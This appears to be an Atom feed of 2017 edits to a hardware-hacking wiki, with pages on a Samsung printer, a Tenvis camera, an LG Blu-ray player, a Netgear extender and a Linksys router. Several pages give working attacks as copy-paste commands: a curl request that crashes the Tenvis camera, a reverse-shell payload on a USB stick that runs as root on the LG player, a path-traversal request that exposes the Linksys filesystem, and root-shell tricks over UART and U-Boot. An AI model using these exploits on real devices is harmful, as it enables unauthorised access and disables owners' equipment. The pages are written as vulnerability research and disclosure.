&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:SAMSUNG_SLM3320ND.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Samsung SL-M3320ND Printer=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;The robust ProXpress M3320ND features print speeds of up to35 ppm. Powered by a Cortex™-A5 core processor and 128 MB of memory, it delivers unsurpassed performance for business applications. High performance coupled with ease-of-use enables businesses to accelerate document and image processing for increased efficiency.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Samsung-ProXpress-SL-M3320ND-Monochrome-Printer/dp/B00COA3GVE Purchase the Samsung SL-M3320ND at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Unsigned NAND Backup and Overwrite==&lt;br /&gt;
&lt;br /&gt;
?????????&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
SAMSUNG_SLM3320ND_NAND.JPG&lt;br /&gt;
SAMSUNG_SLM3320ND_FW_HEX.JPG&lt;br /&gt;
SAMSUNG_SLM3320ND_INK_LEVEL.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND_INK_LEVEL.JPG&amp;diff=2839</id>
		<title>File:SAMSUNG SLM3320ND INK LEVEL.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND_INK_LEVEL.JPG&amp;diff=2839"/>
		<updated>2017-08-09T04:51:51Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND_FW_HEX.JPG&amp;diff=2838</id>
		<title>File:SAMSUNG SLM3320ND FW HEX.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND_FW_HEX.JPG&amp;diff=2838"/>
		<updated>2017-08-09T04:51:43Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND_NAND.JPG&amp;diff=2837</id>
		<title>File:SAMSUNG SLM3320ND NAND.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND_NAND.JPG&amp;diff=2837"/>
		<updated>2017-08-09T04:51:32Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND.JPG&amp;diff=2836</id>
		<title>File:SAMSUNG SLM3320ND.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:SAMSUNG_SLM3320ND.JPG&amp;diff=2836"/>
		<updated>2017-08-09T04:50:23Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2835</id>
		<title>Tenvis T8810</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2835"/>
		<updated>2017-08-09T04:42:50Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:TENVIS_T8110.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Tenvis T8810=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
TENVIS_T8110_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Remote Denial of Service==&lt;br /&gt;
&lt;br /&gt;
===WARNING===&lt;br /&gt;
&lt;br /&gt;
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.&lt;br /&gt;
&lt;br /&gt;
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.1.88/cgi-bin/hi3510/param.cgi&#039; -H &#039;Authorization: Basic YWRtaW46YWRtaW4=&#039; -H &#039;Content-Type: application/x-www-form-urlencoded&#039; -H &#039;Connection: keep-alive&#039; --data &#039;cmd=setwirelessattr&amp;amp;cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&amp;amp;-wf_ssid=%0Assidgoesheres%0D&amp;amp;-wf_auth=3&amp;amp;-wf_mode=%0Dabcdef&amp;amp;-wf_enc=0&amp;amp;-wf_enable=1&amp;amp;-wf_key=key12345&#039; --compressed​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2834</id>
		<title>Tenvis T8810</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2834"/>
		<updated>2017-08-09T04:42:07Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:TENVIS_T8110.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Tenvis T8810=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
TENVIS_T8110_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Remote Denial of Service==&lt;br /&gt;
&lt;br /&gt;
===WARNING===&lt;br /&gt;
&lt;br /&gt;
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.&lt;br /&gt;
&lt;br /&gt;
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.1.88/cgi-bin/hi3510/param.cgi&#039; -H &#039;Authorization: Basic YWRtaW46YWRtaW4=&#039; -H &#039;Content-Type: application/x-www-form-urlencoded&#039; -H &#039;Connection: keep-alive&#039; --data &#039;cmd=setwirelessattr&amp;amp;cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&amp;amp;-wf_ssid=%0Assidgoesheres%0D&amp;amp;-wf_auth=3&amp;amp;-wf_mode=%0Dabcdef&amp;amp;-wf_enc=0&amp;amp;-wf_enable=1&amp;amp;-wf_key=key12345&#039; --compressed​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:TENVIS_T8110_UART.JPG&amp;diff=2833</id>
		<title>File:TENVIS T8110 UART.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:TENVIS_T8110_UART.JPG&amp;diff=2833"/>
		<updated>2017-08-09T04:40:18Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:TENVIS_T8110.JPG&amp;diff=2832</id>
		<title>File:TENVIS T8110.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:TENVIS_T8110.JPG&amp;diff=2832"/>
		<updated>2017-08-09T04:40:08Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2831</id>
		<title>Tenvis T8810</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2831"/>
		<updated>2017-08-09T04:35:04Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Networking  =Tenvis T8810=   == Purchase == Buying devices is expensive and, in a lot of ca...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:TENVIS_T8810.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Tenvis T8810=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
TENVIS_T8810_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Remote Denial of Service==&lt;br /&gt;
&lt;br /&gt;
===WARNING===&lt;br /&gt;
&lt;br /&gt;
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.&lt;br /&gt;
&lt;br /&gt;
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.1.88/cgi-bin/hi3510/param.cgi&#039; -H &#039;Authorization: Basic YWRtaW46YWRtaW4=&#039; -H &#039;Content-Type: application/x-www-form-urlencoded&#039; -H &#039;Connection: keep-alive&#039; --data &#039;cmd=setwirelessattr&amp;amp;cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&amp;amp;-wf_ssid=%0Assidgoesheres%0D&amp;amp;-wf_auth=3&amp;amp;-wf_mode=%0Dabcdef&amp;amp;-wf_enc=0&amp;amp;-wf_enable=1&amp;amp;-wf_key=key12345&#039; --compressed​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=LG_BP350%E2%80%8B%E2%80%8B&amp;diff=2790</id>
		<title>LG BP350​​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=LG_BP350%E2%80%8B%E2%80%8B&amp;diff=2790"/>
		<updated>2017-08-06T04:42:05Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:LG_BP350.JPG|left|thumb|160px]]&lt;br /&gt;
[[Category:Blu-Ray Players]]&lt;br /&gt;
&lt;br /&gt;
=LG BP350=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/LG-Electronics-BP350-Blu-Ray-Player/dp/B00TIAXSDY/ref=as_li_ss_tl?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1501937453&amp;amp;sr=1-1&amp;amp;keywords=BP350&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=79d2d5e81593803f0bc89ca5e9d0e485 Purchase the LG BP350 Blu-ray Player at Amazon]&lt;br /&gt;
&lt;br /&gt;
==App Launcher Script Hijack==&lt;br /&gt;
&lt;br /&gt;
The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script, as illustrated below, for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh&lt;br /&gt;
#!/bin/sh&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
echo &amp;quot;Enter pandora.sh&amp;quot;&lt;br /&gt;
echo &amp;quot;Call pandorastub&amp;quot; $PWD&lt;br /&gt;
&lt;br /&gt;
export QT_QWS_FONTDIR=/usr/share/font&lt;br /&gt;
echo &amp;quot;pandora font path = &amp;quot; $QT_QWS_FONTDIR&lt;br /&gt;
&lt;br /&gt;
export QT_PLUGIN_PATH=/plugins&lt;br /&gt;
echo &amp;quot;QT_PLUGIN_PATH =$QT_PLUGIN_PATH&amp;quot;&lt;br /&gt;
&lt;br /&gt;
if [ -e /mnt/sda1/PandoraApp ]; then&lt;br /&gt;
    echo &amp;quot;/mnt/sda1/PandoraApp -qws -display directfb&amp;quot;&lt;br /&gt;
    /mnt/sda1/PandoraApp -qws -display directfb&lt;br /&gt;
elif [ -e /mnt/sdb1/PandoraApp ]; then&lt;br /&gt;
    echo &amp;quot;/mnt/sdb1/PandoraApp -qws -display directfb&amp;quot;&lt;br /&gt;
    /mnt/sdb1/PandoraApp -qws -display directfb&lt;br /&gt;
else&lt;br /&gt;
    echo &amp;quot;pandora not for vosd&amp;quot;&lt;br /&gt;
    echo &amp;quot;/usr/local/bin/pandora/PandoraApp -qws -display directfb&amp;quot;&lt;br /&gt;
    /usr/local/bin/pandora/PandoraApp -qws -display directfb &lt;br /&gt;
fi&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&lt;br /&gt;
The following command will add a file to a flashdrive that will spawn a reverse TCP shell, and proceed to execute the pandora app normally.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;printf &amp;quot;/bin/bash -i &amp;gt;&amp;amp; /dev/tcp/172.20.20.20/4444 0&amp;gt;&amp;amp;1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;&amp;quot; &amp;gt; /dev/yourflashdrive/PandoraApp&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Netgear_WN3000RP&amp;diff=2741</id>
		<title>Netgear WN3000RP</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Netgear_WN3000RP&amp;diff=2741"/>
		<updated>2017-08-04T00:50:09Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NETGEAR_WN3000RP.JPG|thumb|320px]]&lt;br /&gt;
[[Category:Netgear WN3000RP]]&lt;br /&gt;
&lt;br /&gt;
=Netgear WN3000RP=&lt;br /&gt;
&lt;br /&gt;
The Netgear WN3000RP is a wifi range extender which runs OpenWRT KAMIKAZE on MIPS32.&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Move around with your mobile devices and keep them connected by giving your existing WiFi coverage a boost. This small, easy-to-install wall-plug WiFi range extender also creates new WiFi connectivity for up to 1 wired device like a Smart TV, Blu-ray player or game console.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
[https://www.amazon.com/NETGEAR-Version-Wi-Fi-Extender-WN3000RP/dp/B004YAYM06/ Amazon]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Hardware Root===&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at 57600,8n1. Once the device completes booting, a root shell is executed on the UART TTY. a telnet daemon can be launched by executing &#039;/usr/sbin/telnetd &amp;amp;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:NETGEAR_WN3000RP_UART.JPG|thumb|320px]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Miniterm.py -p /dev/ttyUSB0 -b 57600&lt;br /&gt;
  _______                     ________        __&lt;br /&gt;
 |       |.-----.-----.-----.|  |  |  |.----.|  |_&lt;br /&gt;
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|&lt;br /&gt;
 |_______||   __|_____|__|__||________||__|  |____|&lt;br /&gt;
          |__| W I R E L E S S   F R E E D O M&lt;br /&gt;
 KAMIKAZE (bleeding edge, r18571) ------------------&lt;br /&gt;
  * 10 oz Vodka       Shake well with ice and strain&lt;br /&gt;
  * 10 oz Triple sec  mixture into 10 shot glasses.&lt;br /&gt;
  * 10 oz lime juice  Salute!&lt;br /&gt;
 ---------------------------------------------------&lt;br /&gt;
root@WN3000RPv3:/# /usr/sbin/telnetd &amp;amp;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Netgear_WN3000RP&amp;diff=2738</id>
		<title>Netgear WN3000RP</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Netgear_WN3000RP&amp;diff=2738"/>
		<updated>2017-08-04T00:05:01Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} 320px Category:Netgear WN3000RP  =Netgear WN3000RP=  The Netgear WN3000RP is a wifi range extender which ru...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NETGEAR_WN3000RP.JPG|thumb|320px]]&lt;br /&gt;
[[Category:Netgear WN3000RP]]&lt;br /&gt;
&lt;br /&gt;
=Netgear WN3000RP=&lt;br /&gt;
&lt;br /&gt;
The Netgear WN3000RP is a wifi range extender which runs OpenWRT KAMIKAZE on MIPS32.&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Move around with your mobile devices and keep them connected by giving your existing WiFi coverage a boost. This small, easy-to-install wall-plug WiFi range extender also creates new WiFi connectivity for up to 1 wired device like a Smart TV, Blu-ray player or game console.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
[https://www.amazon.com/NETGEAR-Version-Wi-Fi-Extender-WN3000RP/dp/B004YAYM06/ Amazon]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===UART===&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at 57600,8n1. Once the device completes booting, a root shell is executed on the UART TTY. a telnet daemon can be launched by executing &#039;/usr/sbin/telnetd &amp;amp;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:NETGEAR_WN3000RP_UART.JPG|320px]]&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Miniterm.py -p /dev/ttyUSB0 -b 57600&lt;br /&gt;
  _______                     ________        __&lt;br /&gt;
 |       |.-----.-----.-----.|  |  |  |.----.|  |_&lt;br /&gt;
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|&lt;br /&gt;
 |_______||   __|_____|__|__||________||__|  |____|&lt;br /&gt;
          |__| W I R E L E S S   F R E E D O M&lt;br /&gt;
 KAMIKAZE (bleeding edge, r18571) ------------------&lt;br /&gt;
  * 10 oz Vodka       Shake well with ice and strain&lt;br /&gt;
  * 10 oz Triple sec  mixture into 10 shot glasses.&lt;br /&gt;
  * 10 oz lime juice  Salute!&lt;br /&gt;
 ---------------------------------------------------&lt;br /&gt;
root@WN3000RPv3:/# /usr/sbin/telnetd &amp;amp;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:NETGEAR_WN3000RP_UART.JPG&amp;diff=2737</id>
		<title>File:NETGEAR WN3000RP UART.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:NETGEAR_WN3000RP_UART.JPG&amp;diff=2737"/>
		<updated>2017-08-04T00:03:39Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:NETGEAR_WN3000RP.JPG&amp;diff=2736</id>
		<title>File:NETGEAR WN3000RP.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:NETGEAR_WN3000RP.JPG&amp;diff=2736"/>
		<updated>2017-08-04T00:02:38Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Linksys_WRT1200AC&amp;diff=2735</id>
		<title>Linksys WRT1200AC</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Linksys_WRT1200AC&amp;diff=2735"/>
		<updated>2017-08-03T23:59:48Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} 320px Category:Linksys WRT1200AC  =Linksys WRT1200AC=  Built on the foundation of our original WRT&amp;#039;s open-...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:LINKSYS_WRT1200AC.JPG|thumb|320px]]&lt;br /&gt;
[[Category:Linksys WRT1200AC]]&lt;br /&gt;
&lt;br /&gt;
=Linksys WRT1200AC=&lt;br /&gt;
&lt;br /&gt;
Built on the foundation of our original WRT&#039;s open-source heritage, the Linksys WRT1200AC delivers superior network performance for the most demanding users. The WRT1200AC features two external antennas, a powerful 1.3GHz dual-core ARM, and Wireless-AC to provide high-speed Wi-Fi connections with exceptional range.&lt;br /&gt;
&lt;br /&gt;
[https://www.amazon.com/Linksys-Dual-Band-Wireless-Gigabit-WRT1200AC/dp/B00UVN20T0 Amazon]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Post Authentication Arbitrary File Access==&lt;br /&gt;
&lt;br /&gt;
Arbitrary file access due to improper sanitization of path field in media sharing setup.&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&lt;br /&gt;
​&lt;br /&gt;
Firmware Version: 1.0.5.177401&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following curl command is a Proof of Concept which demonstrates creating a file share at /.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;curl -i -s -k  -X &#039;POST&#039; \&lt;br /&gt;
-H &#039;Content-Type: application/json; charset=UTF-8&#039; -H &#039;X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder&#039; \&lt;br /&gt;
-H &#039;Expires: Fri, 10 Oct 2013 14:19:41 GMT&#039; -H &#039;X-JNAP-Authorization: Basic &amp;lt;BASE64 CREDS&amp;gt;&#039; \&lt;br /&gt;
-H &#039;X-Requested-With: XMLHttpRequest&#039; \&lt;br /&gt;
-H &#039;Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html&#039; \&lt;br /&gt;
-b &#039;initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20&amp;lt;BASE64 CREDS&amp;gt;; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1&#039; \&lt;br /&gt;
--data-binary $&#039;{\&amp;quot;name\&amp;quot;:\&amp;quot;HAXHAXHAX\&amp;quot;,\&amp;quot;partitionName\&amp;quot;:\&amp;quot;/dev/sda1\&amp;quot;,\&amp;quot;path\&amp;quot;:\&amp;quot;/../../../../../../\&amp;quot;,\&amp;quot;isReadOnly\&amp;quot;:false,\&amp;quot;groupsWithPermission\&amp;quot;:[\&amp;quot;testuser\&amp;quot;,\&amp;quot;admin\&amp;quot;]}&#039; \&lt;br /&gt;
&#039;http://192.168.1.1/JNAP/&#039;&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:LINKSYS_WRT1200AC.JPG&amp;diff=2734</id>
		<title>File:LINKSYS WRT1200AC.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:LINKSYS_WRT1200AC.JPG&amp;diff=2734"/>
		<updated>2017-08-03T23:59:28Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:LG_BP350.JPG&amp;diff=2732</id>
		<title>File:LG BP350.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:LG_BP350.JPG&amp;diff=2732"/>
		<updated>2017-08-03T23:55:29Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:DLINK_936L.jpg&amp;diff=2730</id>
		<title>File:DLINK 936L.jpg</title>
